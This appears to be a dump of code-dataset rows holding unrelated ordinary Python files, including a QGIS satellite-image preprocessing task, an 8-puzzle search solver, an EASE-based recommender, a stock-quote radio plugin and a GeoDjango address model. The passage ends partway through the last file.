23,135 | 9a7c235764edaafd2bbaa829babab09409b4e2c4 | from qgis.core import (QgsApplication, QgsTask, QgsMessageLog, Qgis)
import os
import subprocess
import time
import datetime
from osgeo import gdal
from osgeo import ogr
import numpy as np
from .image import Image
from .place import Place
from .classifier import Classifier
from .. import Lumberjack
class PreProcessTask(QgsTask):
def obtain_places(self, root_directory):
# Iterates through the root directory searching the files needed to
# do the processing.
# Creates an structure with the Place and Image data objects so it's
# easy to iterate, access files and improves readability
suf_b1 = Lumberjack.BAND_SUFFIX.format("1")
suf_metadata = Lumberjack.IMAGE_METADATA_SUFFIX
root_directory = os.path.normpath(root_directory)
places = []
for place_directory in os.scandir(root_directory):
if (place_directory.is_dir()):
place = Place(place_directory.path)
for img_directory_or_file in os.scandir(place.directory_path):
if (img_directory_or_file.is_dir()):
image_directory = str(img_directory_or_file.path)
image = Image(image_directory)
for image_subfile in os.scandir(image_directory):
image_subfile_path = str(image_subfile.path)
if (image_subfile_path[-(len(suf_b1)):] == suf_b1):
# image.base_name = image_subfile_path[-48:-8]
image.base_name = (os.path.split(image_subfile_path)[1])[:-(len(suf_b1))]
if (image_subfile_path[-(len(suf_metadata)):] == suf_metadata):
image.metadata_file = image_subfile_path
place.images.append(image)
elif (img_directory_or_file.is_file()):
file_path = str(img_directory_or_file.path)
if (file_path[-(len(Lumberjack.EXTENSION_FILE_SUFFIX)):] == Lumberjack.EXTENSION_FILE_SUFFIX):
place.extension_file_path = file_path
elif (file_path[-(len(Lumberjack.SHAPEFILE_SUFFIX)):] == Lumberjack.SHAPEFILE_SUFFIX):
place.vector_file_path = file_path
elif (file_path[-(len(Lumberjack.MASK_SUFFIX)):] == Lumberjack.MASK_SUFFIX):
place.mask = file_path
places.append(place)
return places
def calculate_extension(self, extension_file_path):
extension_dataset = gdal.Open(extension_file_path, gdal.GA_ReadOnly)
geoTransform = extension_dataset.GetGeoTransform()
minx = geoTransform[0]
maxy = geoTransform[3]
maxx = minx + geoTransform[1] * extension_dataset.RasterXSize
miny = maxy + geoTransform[5] * extension_dataset.RasterYSize
return minx, maxy, maxx, miny
def crop_images(self, file_name_band, file_name_crop, minx, maxy, maxx, miny):
# Crops all images according to the extension.
for i in range(1, Lumberjack.BAND_TOTAL + 1):
# Crop image to extension
command_translate = ("gdal_translate -projwin {} {} {} {} -ot Int16 -of GTiff \"{}\" \"{}\"")
subprocess.call(command_translate.format(
minx, maxy, maxx, miny, file_name_band.format(i),
file_name_crop.format(i)), stdout=open(os.devnull, 'wb'), shell=True)
def merge_images(self, files, file_name_merged, bands_amount, data_type):
bands_acum = 0
output_dataset = None
print("File Name Merged: " + file_name_merged)
dataset = gdal.Open(files[0], gdal.GA_ReadOnly)
driver = gdal.GetDriverByName('GTiff')
output_dataset = driver.Create(
file_name_merged, dataset.RasterXSize, dataset.RasterYSize, bands_amount, data_type)
output_dataset.SetGeoTransform(dataset.GetGeoTransform())
output_dataset.SetProjection(dataset.GetProjection())
dataset = None
for i, file_path in enumerate(files):
dataset = gdal.Open(file_path, gdal.GA_ReadOnly)
for j in range(dataset.RasterCount):
bands_acum += 1
band_read = dataset.GetRasterBand(j+1).ReadAsArray()
outband = output_dataset.GetRasterBand(bands_acum)
outband.SetDescription(dataset.GetRasterBand(j+1).GetDescription())
outband.WriteArray(band_read)
def calculate_total_features(self, files):
total = 0
for file in files:
dataset = gdal.Open(file, gdal.GA_ReadOnly)
total += dataset.RasterCount
return total
def pre_process_images(self, places):
for place in places:
minx, maxy, maxx, miny = self.calculate_extension(
place.extension_file_path)
for image in place.images:
# image represent each landsat image (a folder with the bands)
print("Landsat image directory: {}".format(image.path))
file_name_band = os.path.join(image.path, "{}{}".format(image.base_name, Lumberjack.BAND_SUFFIX))
file_name_crop = "{}{}".format(file_name_band[:-4], Lumberjack.CROP_SUFFIX)
file_name_merged = os.path.join(image.path, "{}{}".format(image.base_name, Lumberjack.MERGED_SUFFIX))
# Crop all bands according to the extent file
self.crop_images(file_name_band, file_name_crop, minx, maxy, maxx, miny)
# Merge all bands
files_to_merge = []
for i in range(1, Lumberjack.BAND_TOTAL + 1):
files_to_merge.append(file_name_crop.format(i))
self.merge_images(files_to_merge, file_name_merged, Lumberjack.BAND_TOTAL, gdal.GDT_Int16)
for file in files_to_merge:
if os.path.exists(file):
os.remove(file)
for feature in self.features:
feature.execute(file_name_merged, image)
def __init__(self, description, task):
super().__init__(description, task)
self.exception = None
def run(self):
"""Here you implement your heavy lifting.
Should periodically test for isCanceled() to gracefully abort.
This method MUST return True or False.
Raising exceptions will crash QGIS, so we handle them
internally and raise them in self.finished
"""
raise NotImplementedError("Subclasses mut override run()")
def finished(self, result):
"""
This function is automatically called when the task has completed
(successfully or not).
You implement finished() to do whatever follow-up stuff should happen
after the task is complete. finished is always called from the main
thread, so it's safe to do GUI operations and raise Python
exceptions here.
result is the return value from self.run.
"""
raise NotImplementedError("Subclasses mut override finished()")
def cancel(self):
QgsMessageLog.logMessage(
'Task "{name}" was canceled'.format(name=self.description()),
Lumberjack.MESSAGE_CATEGORY, Qgis.Info)
super().cancel()
|
23,136 | a9ab7eb9f144dffad8e13174dccc32104e38dda2 | # -*- coding: utf-8 -*-
"""
Created on Sun Sep 15 07:56:12 2019
@author: Pups
"""
from django.core.management.base import BaseCommand, CommandError
from Page_1.models import ProductCategory
class Command(BaseCommand):
def handle(self, *args, **options):
category = ProductCategory.objects.all()
print(category)
|
23,137 | 6b03b16d561b5b804a7253b0ab904eda99dd22a1 | i=input();
print "hi",i;
|
23,138 | 0517bb184eaf33869e0d5ee15816b2293cdaefd9 | #! /usr/bin/python2
from sys import argv
from math import sqrt
from Queue import Queue
from Queue import PriorityQueue
from time import time
import resource
class Statistics:
def __init__(self):
self.__nodes_expanded = 0
self.__depth = 0
self.__max_search_depth = 0
def node_expanded(self, node):
self.__nodes_expanded += 1
def node_visited(self, node):
if node.get_depth() > self.__max_search_depth:
self.__max_search_depth = node.get_depth()
def get_nodes_expanded(self):
return self.__nodes_expanded
def get_max_search_depth(self):
return self.__max_search_depth
""" Models a board state. """
class BoardState:
""" Creates a new board state from a state string or a grid. """
def __init__(self, state, previous_state, depth, move):
if isinstance(state, str):
tiles = state.split(",")
dimension = int(sqrt(len(tiles)))
self.__grid = [[int(tiles[row * dimension + col]) for col in range(dimension)] for row in range(dimension)]
elif isinstance(state, list):
self.__grid = state
self.__previous_state = previous_state
self.__depth = depth
self.__move = move
hash_string = ""
for row in range(len(self.__grid)):
for col in range(len(self.__grid)):
hash_string += str(self.__grid[row][col])
self.__hash = int(hash_string)
def __get_blank_location(self):
for row in range(len(self.__grid)):
for col in range(len(self.__grid[row])):
if self.__grid[row][col] == 0:
return (row, col)
return None
def __copy_grid(self):
return [[self.__grid[row][col] for col in range(len(self.__grid))] for row in range(len(self.__grid))]
""" Returns the possible next states. """
def get_possible_next_states(self):
next_states = []
blank_row, blank_col = self.__get_blank_location()
# Decide if we can go up.
if blank_row != 0:
new_grid = self.__copy_grid()
new_grid[blank_row][blank_col] = new_grid[blank_row - 1][blank_col]
new_grid[blank_row - 1][blank_col] = 0
next_states.append(("Up", new_grid))
# Decide if we can go down.
if blank_row != len(self.__grid) - 1:
new_grid = self.__copy_grid()
new_grid[blank_row][blank_col] = new_grid[blank_row + 1][blank_col]
new_grid[blank_row + 1][blank_col] = 0
next_states.append(("Down", new_grid))
# Left.
if blank_col != 0:
new_grid = self.__copy_grid()
new_grid[blank_row][blank_col] = new_grid[blank_row][blank_col - 1]
new_grid[blank_row][blank_col - 1] = 0
next_states.append(("Left", new_grid))
# Right.
if blank_col != len(self.__grid) - 1:
new_grid = self.__copy_grid()
new_grid[blank_row][blank_col] = new_grid[blank_row][blank_col + 1]
new_grid[blank_row][blank_col + 1] = 0
next_states.append(("Right", new_grid))
return next_states
def is_goal_state(self):
for row in range(len(self.__grid)):
for col in range(len(self.__grid[row])):
if self.__grid[row][col] != row * len(self.__grid) + col:
return False
return True
def get_previous_state(self):
return self.__previous_state
def get_path(self):
path = []
state = self
while state.__move != None:
path.insert(0, state.__move)
state = state.get_previous_state()
return path
def get_depth(self):
return self.__depth
def distance(self):
distance = 0
for row in range(len(self.__grid)):
for col in range(len(self.__grid)):
value = self.__grid[row][col]
target_position_row = value // len(self.__grid)
target_position_col = value % len(self.__grid)
distance = distance + abs(row - target_position_row) + abs(col - target_position_col)
return distance
def __hash__(self):
return self.__hash
def run_bfs(initial_state):
frontier = Queue()
search(initial_state, lambda: frontier.get(), lambda state: frontier.put(state), lambda: frontier.empty(), False)
def run_dfs(initial_state):
frontier = list()
search(initial_state, lambda: frontier.pop(), lambda state: frontier.append(state), lambda: len(frontier) == 0, True)
def run_ast(initial_state):
frontier = PriorityQueue()
search(initial_state, lambda: frontier.get()[1], lambda state: frontier.put((state.distance(), state)), lambda: frontier.empty(), False)
def search(initial_state, next_state_function, frontier_add_function, is_frontier_empty, reverse):
start_time = time()
visited = set()
frontier = set()
statistics = Statistics()
frontier_add_function(initial_state)
frontier.add(hash(initial_state))
goal_state = None
while not is_frontier_empty():
current_state = next_state_function()
visited.add(hash(current_state))
frontier.remove(hash(current_state))
if current_state.is_goal_state():
goal_state = current_state
break
else:
next_states = current_state.get_possible_next_states()
if reverse:
next_states = reversed(next_states)
statistics.node_expanded(current_state)
for direction, grid in next_states:
new_state = BoardState(grid, current_state, current_state.get_depth() + 1, direction)
new_state_hash = hash(new_state)
if not new_state_hash in visited and not new_state_hash in frontier:
statistics.node_visited(new_state)
frontier_add_function(new_state)
frontier.add(new_state_hash)
if goal_state != None:
output_file = open("output.txt", "w")
path = goal_state.get_path()
output_file.write("path_to_goal: %s\n" % (path))
output_file.write("cost_of_path: %i\n" % (len(path)))
output_file.write("nodes_expanded: %i\n" % (statistics.get_nodes_expanded()))
output_file.write("search_depth: %i\n" % (current_state.get_depth()))
output_file.write("max_search_depth: %i\n" % (statistics.get_max_search_depth()))
mem = resource.getrusage(resource.RUSAGE_SELF).ru_maxrss / 1024
run_time = time() - start_time
output_file.write("running_time: %s\n" % (str(run_time)))
output_file.write("max_ram_usage: %s\n" % (str(mem)))
output_file.close()
def main():
algorithm = argv[1]
initial_state_string = argv[2]
initial_board_state = BoardState(initial_state_string, None, 0, None)
if algorithm == "bfs":
run_bfs(initial_board_state)
elif algorithm == "dfs":
run_dfs(initial_board_state)
elif algorithm == "ast":
run_ast(initial_board_state)
if __name__ == "__main__":
main() |
23,139 | 5088c09a1710a7e96bad13fa96dd80c68e9440dc | sentence = "This is a common interview question"
this_dict = {}
for x in sentence:
if x != " ":
if x in this_dict:
this_dict[x] += 1
else:
this_dict[x] = 1
sorted_dict = sorted(this_dict.items(), key=lambda this: this[1], reverse=True)
print(sorted_dict[0])
|
23,140 | a5447733bd17b843b7c926e8fca87c4e8f914620 | from django.urls import path
from . import views
# used within django.url.reverse() method calls
app_name = 'user'
urlpatterns = [
# link the url path with the view, and define a pattern for the reverse()
path('create/', views.CreateUserView.as_view(), name='create'),
path('token/', views.CreateTokenView.as_view(), name='token'),
path('me/', views.ManageUserView.as_view(), name='self'),
]
|
23,141 | f764eec064b0b862255d10f0e782dabc37b14ac4 | r=float(input())
volume=(4*3.14159*r*r*r)/3;
print("VOLUME = %.3lf" % volume)
|
23,142 | 64c885294a72e47b3e72f01bf22209a1e93ad7bf |
if __name__=='__main__':
print('----------- 用于从接受的新数据,进行构造,利用模型产生新的提交结果 -----------') |
23,143 | 98f228b09359ee495b1f002b61f8a79d39389885 | import os
import math
import copy
import pickle
from time import time
import numpy as np
from scipy import sparse
import torch
from torch import dtype
import torch.nn as nn
import torch.nn.functional as F
from torch.autograd import Variable
from concurrent import futures
from base.BaseRecommender import BaseRecommender
from dataloader.DataBatcher import DataBatcher
from utils import Logger, set_random_seed
from sklearn.cluster import KMeans
from collections import OrderedDict
from tqdm import tqdm
import warnings
warnings.filterwarnings("ignore")
class LOCA_EASE(BaseRecommender):
def __init__(self, dataset, model_conf, device):
super(LOCA_EASE, self).__init__(dataset, model_conf)
self.dataset = dataset
self.num_users = dataset.num_users
self.num_items = dataset.num_items
# CoLA conf.
self.num_local = model_conf['num_local']
self.anchor_selection = model_conf['anchor_selection']
self.dist_type = model_conf['dist_type']
self.kernel_type = model_conf['kernel_type']
self.train_h = model_conf['train_h']
self.test_h = model_conf['test_h']
self.embedding_type = model_conf['embedding']
self.model_type = 'EASE'
self.user_embedding = self.load_embedding(self.embedding_type)
self.kernel_matrix = self.build_kernel_matrix()
self.candidate_users = []
for kernel in self.kernel_matrix:
self.candidate_users.append(kernel[2].nonzero()[0])
self.num_local_threads = model_conf['num_local_threads']
# Local conf.
self.model_conf = model_conf
self.local_models = []
self.local_dirs = []
self.device = device
self.share_memory()
def train_single_model(self, local_num):
# KEY: make it executed in independent threads.
evaluator, early_stop, local_conf = self.common_object
early_stop = copy.deepcopy(early_stop)
logger = self.init_local_logger(local_num)
logger.info('Local %d train start...' % local_num)
# build local model
train_weight = torch.tensor(self.kernel_matrix[local_num][0]) # vector [Num_user]
test_weight = torch.tensor(self.kernel_matrix[local_num][2]) # vector [Num_user]
local_model = LocalEASE(local_num, train_weight, test_weight, self.candidate_users[local_num], self.dataset, self.model_type, self.model_conf, self.device)
# pass optimizer, evaluator, weight matrix with conf.
local_best_score, local_train_time = local_model.train_model(self.dataset, evaluator, early_stop, logger, local_conf)
# train done.
logger.info('Local %d done...(%.2fs)' % (local_num, local_train_time))
return local_best_score, local_train_time
def train_model(self, dataset, evaluator, early_stop, logger, config):
self.base_dir = logger.log_dir
logger.info("Train coverage : %.5f (Average), %.5f (Max), %.5f (Min)" % (np.mean(self.train_coverage), max(self.train_coverage), min(self.train_coverage)))
logger.info("Test coverage : %.5f (Average), %.5f (Max), %.5f (Min)" % (np.mean(self.test_coverage), max(self.test_coverage), min(self.test_coverage)))
self.common_object = (evaluator, early_stop, config)
# dataset.set_eval_data('valid')
total_train_time = 0.0
train_start = time()
# train all models
if self.num_local_threads > 1:
with futures.ProcessPoolExecutor(max_workers=self.num_local_threads) as exe:
ret = list(exe.map(self.train_single_model, list(range(self.num_local))))
else:
for i in range(self.num_local):
local_best_score, local_train_time = self.train_single_model(i)
total_train_time += local_train_time
total_train_time = time() - train_start
test_score = evaluator.evaluate(self)
test_score_str = ['%s=%.4f' % (k, test_score[k]) for k in test_score]
logger.info(', '.join(test_score_str))
return test_score, total_train_time
def init_local_logger(self, local_num):
exp_dir = os.path.join(self.base_dir, 'local_%d' % local_num)
if not os.path.exists(exp_dir):
os.mkdir(exp_dir)
logger = Logger(exp_dir)
# self.exp_logger.append(logger)
return logger
def predict(self, user_ids, eval_pos_matrix, eval_items=None):
# mode = dataset.eval_mode
# mode = self.eval_mode
batch_pos_matrix = eval_pos_matrix[user_ids]
# ======local output
eval_output = torch.zeros((self.num_users, self.num_items), dtype=torch.float32)
weights_sum = torch.zeros((self.num_users, 1), dtype=torch.float32)
for local_num in range(self.num_local):
# print("local_%d loading..." % local_num)
local_dir = os.path.join(self.base_dir, 'local_%d' % local_num)
train_weight = torch.tensor(self.kernel_matrix[local_num][0]) # vector
test_weight = torch.tensor(self.kernel_matrix[local_num][2]) # vector
local_model = LocalEASE(local_num, train_weight, test_weight, self.candidate_users[local_num], self.dataset, self.model_type, self.model_conf, self.device)
local_model.restore(local_dir)
cand_users = self.candidate_users[local_num]
cand_eval_users = [u for u in user_ids if u in cand_users]
# local_pred: (# cand_eval_users, # items)
local_pred = local_model.predict(cand_eval_users, eval_pos_matrix, eval_items)
# weights = train_weight if mode == 'valid' else test_weight
weights = test_weight
local_weights = weights[cand_eval_users].view(-1, 1)
eval_output[cand_eval_users] += torch.FloatTensor(local_pred) * local_weights
# eval_output[cand_users] += local_pred[cand_users] * weights.view(-1, 1)[cand_users]
weights_sum[cand_eval_users] += local_weights
eval_output = eval_output[user_ids]
weights_sum = weights_sum[user_ids]
eval_output /= weights_sum
eval_output[torch.isnan(eval_output)] = 0.0 # float('-inf')
# ====== global output
with open(os.path.join(self.dataset.data_dir, self.dataset.data_name, 'output', self.model_type + '_output.p'), 'rb') as f:
global_pred = pickle.load(f)[user_ids]
# global_pred = np.zeros_like(eval_output)
zero_mask = torch.eq(weights_sum, 0).float()
# ====== aggregate
eval_output = torch.Tensor(global_pred) * zero_mask + eval_output
eval_output = eval_output.numpy()
eval_output[batch_pos_matrix.nonzero()] = float('-inf')
return eval_output
def restore(self, log_dir):
self.base_dir = log_dir
pass
def dist(self, a, anchor=None):
# anchor --> matrix
if anchor is None:
if np.sum(a @ a.T) == 0:
return 999
numer = a @ a.T
norm = np.reshape(np.linalg.norm(a, axis=1), (-1, 1))
denom = np.maximum(norm * norm.T, 1e-10)
return (2 / math.pi) * np.arccos(np.clip(numer / denom, -1, 1))
# anchor --> vector
else:
a_anchor = np.reshape(a[anchor], (1, -1))
if np.sum(a_anchor @ a.T) == 0:
return 999
numer = a_anchor @ a.T # (1, user)
norm = np.reshape(np.linalg.norm(a, axis=1), (-1, 1))
denom = np.maximum(norm[anchor] * norm.T, 1e-10) # (1, user)
return np.squeeze((2 / math.pi) * np.arccos(np.clip(numer / denom, -1, 1)))
def kernel(self, a, h=0.8, kernel_type='Epanechnikov', anchor=None):
if anchor is None:
if kernel_type.lower() == 'epanechnikov':
return (3 / 4) * np.maximum(1 - np.power(self.dist(a) / h, 2), 0)
if kernel_type.lower() == 'uniform':
return (self.dist(a) < h)
if kernel_type.lower() == 'triangular':
return max((1 - self.dist(a) / h), 0)
if kernel_type.lower() == 'random':
return np.random.uniform(0, 1) * (self.dist(a) < h)
else:
if kernel_type.lower() == 'epanechnikov':
return (3 / 4) * np.maximum(1 - np.power(self.dist(a, anchor) / h, 2), 0)
if kernel_type.lower() == 'uniform':
return (self.dist(a, anchor) < h)
if kernel_type.lower() == 'triangular':
return max((1 - self.dist(a, anchor) / h), 0)
if kernel_type.lower() == 'random':
return np.random.uniform(0, 1) * (self.dist(a, anchor) < h)
def load_embedding(self, embedding_type):
with open(os.path.join(self.dataset.data_dir, self.dataset.data_name, 'embedding', embedding_type + '_user.p'), 'rb') as f:
embedding = pickle.load(f)
return embedding
def build_kernel_matrix(self):
# for each local model
if self.anchor_selection == 'kmeans':
user_dist_with_centers = KMeans(n_clusters=self.num_local, random_state=0).fit_transform(self.user_embedding)
user_anchors = np.argsort(user_dist_with_centers, axis=0)[0]
elif self.anchor_selection == 'random':
user_anchors = np.random.choice(self.num_users, size=self.num_local, replace=False)
elif self.anchor_selection == 'coverage':
user_anchors = np.zeros(self.num_local, dtype=int)
W_mat = np.zeros((self.num_users, self.num_users), dtype=int)
# if j is covered by i, W_mat[u,i] = 1.
for u in tqdm(range(0, self.num_users, 10)):
u_cover = np.nonzero(self.kernel(self.user_embedding, self.test_h, self.kernel_type, u))[0]
W_mat[u, u_cover] = 1
else:
raise Exception("Choose correct self.anchor_selection")
item_anchors = np.random.choice(self.num_items, size=self.num_local, replace=False)
# for each local model
kernel_ret = []
self.train_coverage = []
self.test_coverage = []
for t in range(self.num_local):
# select anchor
if self.anchor_selection == 'coverage':
user_anchors[t] = np.argmax(np.sum(W_mat, axis=1)) # maximum coverage becomes new anchor
new_covered = np.nonzero(W_mat[user_anchors[t]])[0] # elements which are covered
W_mat[:, new_covered] = 0 # eliminate elements which are covered
user_anchor_t = user_anchors[t]
item_anchor_t = item_anchors[t]
# train user kernel
train_user_kernel_t = self.kernel(self.user_embedding, self.train_h, self.kernel_type, user_anchor_t) #.astype(np.float32)
train_item_kernel_t = np.ones(self.num_items)#.astype(np.float32)
train_coverage_size = (np.count_nonzero(train_user_kernel_t) * np.count_nonzero(train_item_kernel_t)) / (self.num_users * self.num_items)
# test user kernel
test_user_kernel_t = self.kernel(self.user_embedding, self.test_h, self.kernel_type, user_anchor_t) #.astype(np.float32)
test_item_kernel_t = np.ones(self.num_items)#.astype(np.float32)
test_coverage_size = (np.count_nonzero(test_user_kernel_t) * np.count_nonzero(test_item_kernel_t)) / (self.num_users * self.num_items)
kernel_ret.append((train_user_kernel_t, train_item_kernel_t, test_user_kernel_t, test_item_kernel_t))
self.train_coverage.append(train_coverage_size)
self.test_coverage.append(test_coverage_size)
print("Anchor %3d coverage : %.5f (train), %.5f (test)" % (t, train_coverage_size, test_coverage_size))
print("Train coverage : %.5f (Average), %.5f (Max), %.5f (Min)" % (
np.mean(self.train_coverage), max(self.train_coverage), min(self.train_coverage)))
print("Test coverage : %.5f (Average), %.5f (Max), %.5f (Min)" % (
np.mean(self.test_coverage), max(self.test_coverage), min(self.test_coverage)))
return kernel_ret
"""
Wrapper class for local model.
Local model can be any type.
"""
class LocalEASE(BaseRecommender):
def __init__(self, local_num, train_weight, test_weight, candidate_users, dataset, model_type, model_conf, device):
super(LocalEASE, self).__init__(dataset, model_conf)
self.dataset = dataset
self.num_users = dataset.num_users
self.num_items = dataset.num_items
self.model_conf = model_conf
self.device = device
self.local_num = local_num
self.train_weight = train_weight # vector tensor
self.test_weight = test_weight # vector tensor
self.candidate_users = candidate_users
self.reg = model_conf['reg']
def train_model(self, dataset, evaluator, early_stop, logger, config):
# exp conf.
log_dir = logger.log_dir
# prepare data
train_matrix = dataset.train_matrix
wU = self.train_weight.numpy()
wU = wU * self.num_items / wU.sum()
WU = sparse.diags(wU)
start = time()
# P = (X^T * X + λI)^−1
G = train_matrix.transpose().dot(WU).dot(train_matrix).toarray()
diag = np.diag_indices(self.num_items)
G[diag] += self.reg
P = torch.Tensor(G).inverse()
# B = P * (X^T * X − diagMat(γ))
self.enc_w = -P / torch.diag(P)
self.enc_w[diag] = 0
# Save best model
with open(os.path.join(log_dir, 'best_model.p'), 'wb') as f:
pickle.dump(self.enc_w, f, protocol=4)
test_score = evaluator.evaluate_partial(self, candidate_users=self.candidate_users)
test_score_str = ['%s=%.4f' % (k, test_score[k]) for k in test_score]
logger.info('[Local %3d] ' % self.local_num + ', '.join(test_score_str))
total_train_time = time() - start
return early_stop.best_score, total_train_time
def predict(self, user_ids, eval_pos_matrix, eval_items=None):
batch_eval_pos = eval_pos_matrix[user_ids]
eval_output = torch.Tensor(batch_eval_pos.toarray()) @ self.enc_w
if eval_items is not None:
eval_output[np.logical_not(eval_items)]=float('-inf')
else:
eval_output[batch_eval_pos.nonzero()] = float('-inf')
# apply weights
return eval_output.numpy()
def restore(self, log_dir):
with open(os.path.join(log_dir, 'best_model.p'), 'rb') as f:
self.enc_w = pickle.load(f)
|
23,144 | 9ba8706bf507b985ba7b3504def2c7d43a82d18b | import logging
import re
from aprsd import plugin, trace
import yfinance as yf
LOG = logging.getLogger("APRSD")
class StockPlugin(plugin.APRSDPluginBase):
"""Stock market plugin for fetching stock quotes"""
version = "1.0"
command_regex = "^[sS]"
command_name = "stock"
@trace.trace
def command(self, fromcall, message, ack):
LOG.info("StockPlugin")
a = re.search(r"^.*\s+(.*)", message)
if a is not None:
searchcall = a.group(1)
stock_symbol = searchcall.upper()
else:
reply = "No stock symbol"
return reply
LOG.info("Fetch stock quote for '{}'".format(stock_symbol))
try:
stock = yf.Ticker(stock_symbol)
reply = "{} - ask: {} high: {} low: {}".format(
stock_symbol,
stock.info["ask"],
stock.info["dayHigh"],
stock.info["dayLow"],
)
except Exception as e:
LOG.error(
"Failed to fetch stock '{}' from yahoo '{}'".format(stock_symbol, e),
)
reply = "Failed to fetch stock '{}'".format(stock_symbol)
return reply.rstrip()
|
23,145 | 64c6f53cc12835558ad3271d16172174f5257019 | /Users/aysa.fan/anaconda3/lib/python3.6/tarfile.py |
23,146 | fe1846b142566171ff11997602aa4dcc93934620 | # -*- coding: utf-8 -*-
import simplejson as json
from django.contrib.gis.db import models
from django.contrib.gis.geos import Point
from django.template.defaultfilters import slugify
from django.core.exceptions import MultipleObjectsReturned
from googlemaps_localities import settings as localities_settings
from googlemaps_localities import strings, constants
from googlemaps_localities.utils import get_redis_connection
from common.utils.debug import writelog
from rest.utils import render_as_json
class GoogleMapsAddressComponent(models.Model):
"""
Implements a Google Maps component address object
"""
short_name = models.CharField(
verbose_name=strings.GMAC_SHORT_NAME,
max_length=128
)
long_name = models.CharField(
verbose_name=strings.GMAC_LONG_NAME,
max_length=128
)
formatted_name = models.CharField(
verbose_name=strings.GMAC_FORMATTED_NAME,
max_length=512
)
slug = models.SlugField(
verbose_name=strings.GMAC_SLUG,
max_length=512,
blank=True,
null=True
)
component_type = models.CharField(
verbose_name=strings.GMAC_COMPONENT_TYPE,
choices=constants.ADDRESS_COMPONENT_TYPE_CHOICES,
max_length=128
)
parent = models.ForeignKey('self',
verbose_name=strings.GMAC_PARENT,
blank=True,
null=True
)
location = models.PointField(
verbose_name=strings.GMAC_LOCATION,
blank=True,
null=True
)
northeast_bound = models.PointField(
verbose_name=strings.GMAC_NORTHEAST_BOUND,
blank=True,
null=True
)
soutwest_bound = models.PointField(
verbose_name=strings.GMAC_SOUTHWEST_BOUND,
blank=True,
null=True
)
northeast_viewport = models.PointField(
verbose_name=strings.GMAC_NORTHEAST_VIEWPORT,
blank=True,
null=True
)
soutwest_viewport = models.PointField(
verbose_name=strings.GMAC_SOUTHWEST_VIEWPORT,
blank=True,
null=True
)
created_at = models.DateTimeField(
verbose_name=strings.GMAC_CREATED_AT,
auto_now_add=True
)
updated_at = models.DateTimeField(
verbose_name=strings.GMAC_UPDATED_AT,
auto_now=True
)
class Meta:
ordering = ('formatted_name','created_at', )
verbose_name = strings.ADDRESS_COMPONENT
verbose_name_plural = strings.ADDRESS_COMPONENT_PLURAL
unique_together = (
('short_name', 'long_name', 'component_type', 'parent', ),
)
def __unicode__(self):
return self.formatted_name
def save(self, *args, **kwargs):
if self.slug is None or kwargs.pop('override_slug', False):
self.slug = self.create_slug()
result = super(GoogleMapsAddressComponent, self).save(*args, **kwargs)
if self.parent is not None:
self.parent.sync_all_children_to_redis()
self.parent.sync_children_to_redis()
return result
def create_slug(self):
parts = []
elements = self.get_lineage(reverse=True)
for e in elements:
candidate = e.short_name
if candidate.isdigit():
candidate = e.long_name
parts.append(slugify(candidate))
return '/'.join(parts)
@staticmethod
def check_component_type(component_type):
available_types = dict(constants.ADDRESS_COMPONENT_TYPE_CHOICES).keys()
return component_type in available_types
@staticmethod
def get_or_create(short_name, long_name, component_type, parent=None):
# Check component type
if not GoogleMapsAddressComponent.check_component_type(component_type):
return None
# Params for lookup
params = {}
params['short_name'] = short_name
params['long_name'] = long_name
params['component_type'] = component_type
if parent is not None:
params['parent'] = parent
# Object lookup
try:
obj = GoogleMapsAddressComponent.objects.get(**params)
except GoogleMapsAddressComponent.DoesNotExist:
# Not found, we create it.
obj = GoogleMapsAddressComponent(
short_name=short_name,
long_name=long_name,
component_type=component_type,
parent=parent
)
obj.update_formatted_name(commit=False)
obj.save()
return obj
def get_ancestors(self, reverse=False):
results = []
current = self.parent
while current is not None:
results.append(current)
current = current.parent
if reverse:
results.reverse()
return results
def get_lineage(self, reverse=False):
results = []
results.append(self)
results.extend(self.get_ancestors())
if reverse:
results.reverse()
return results
def get_immediate_children(self):
return GoogleMapsAddressComponent.objects.filter(parent=self)
def get_all_children(self, allowed_types=None):
allowed_types = allowed_types or []
results = []
immediate_children = self.get_immediate_children()
results.extend(immediate_children)
for child in immediate_children:
results.extend(child.get_all_children())
if len(allowed_types)>0:
for child in results:
if child.component_type not in allowed_types:
results.remove(child)
return results
def get_all_children_seq(self):
"""
sequencial method homologous to the previous one
"""
results = []
queue = []
children = self.get_immediate_children()
results.extend(children)
queue.extend(children)
while len(queue) > 0:
node = queue.pop()
children = node.get_immediate_children()
results.extend(children)
queue.extend(children)
return results
@staticmethod
def get_children_from_redis(gmac_id, as_objects=True):
"""
get all the children on gmac_id from redis DB
"""
conn = get_redis_connection()
klass = GoogleMapsAddressComponent
results = []
queue = []
children = klass.get_children_id_list_from_redis_by_pk(gmac_id)
results.extend(children)
queue.extend(children)
while len(queue) > 0:
node = queue.pop()
children = klass.get_children_id_list_from_redis_by_pk(node)
results.extend(children)
queue.extend(children)
if as_objects:
results = klass.objects.filter(pk__in=results)
return results
@staticmethod
def get_all_children_from_redis(gmac_id, as_objects=True):
"""
get all the children on gmac_id from redis DB, much FASTER
"""
conn = get_redis_connection()
klass = GoogleMapsAddressComponent
results = klass.get_all_children_id_list_from_redis_by_pk(gmac_id)
if as_objects:
results = klass.objects.filter(pk__in=results)
return results
@staticmethod
def get_id_list_from_redis(gmac_id):
klass = GoogleMapsAddressComponent
results = []
results.append(gmac_id)
results.extend(klass.get_all_children_from_redis(gmac_id, False))
results = [int(e) for e in results]
return results
@staticmethod
def get_redis_children_key(gmac_id):
return "%s:%s" % ('gmac_children',gmac_id)
@staticmethod
def get_redis_all_children_key(gmac_id):
return "%s:%s" % ('gmac_all_sons',gmac_id)
def sync_children_to_redis(self):
conn = get_redis_connection()
key = GoogleMapsAddressComponent.get_redis_children_key(self.pk)
# First, we make sure the key gets destroyed if it exists
conn.delete(key)
# Now we add the keys of the children to the list
children = self.get_immediate_children()
for child in children:
conn.lpush(key, child.pk)
def sync_all_children_to_redis(self):
"""
synchronizes all the children to a Redis list
"""
conn = get_redis_connection()
key = GoogleMapsAddressComponent.get_redis_all_children_key(self.pk)
# First, we make sure the key gets destroyed if it exists
conn.delete(key)
# Now we add the keys of the children to the list
children = self.get_all_children_seq()
for child in children:
conn.lpush(key, child.pk)
@staticmethod
def get_children_id_list_from_redis_by_pk(gmac_id):
try:
gmac = GoogleMapsAddressComponent.objects.get(pk=gmac_id)
conn = get_redis_connection()
key = GoogleMapsAddressComponent.get_redis_children_key(gmac_id)
length = conn.llen(key)
return conn.lrange(key, 0, length)
except GoogleMapsAddressComponent.DoesNotExist:
return None
@staticmethod
def get_all_children_id_list_from_redis_by_pk(gmac_id):
"""
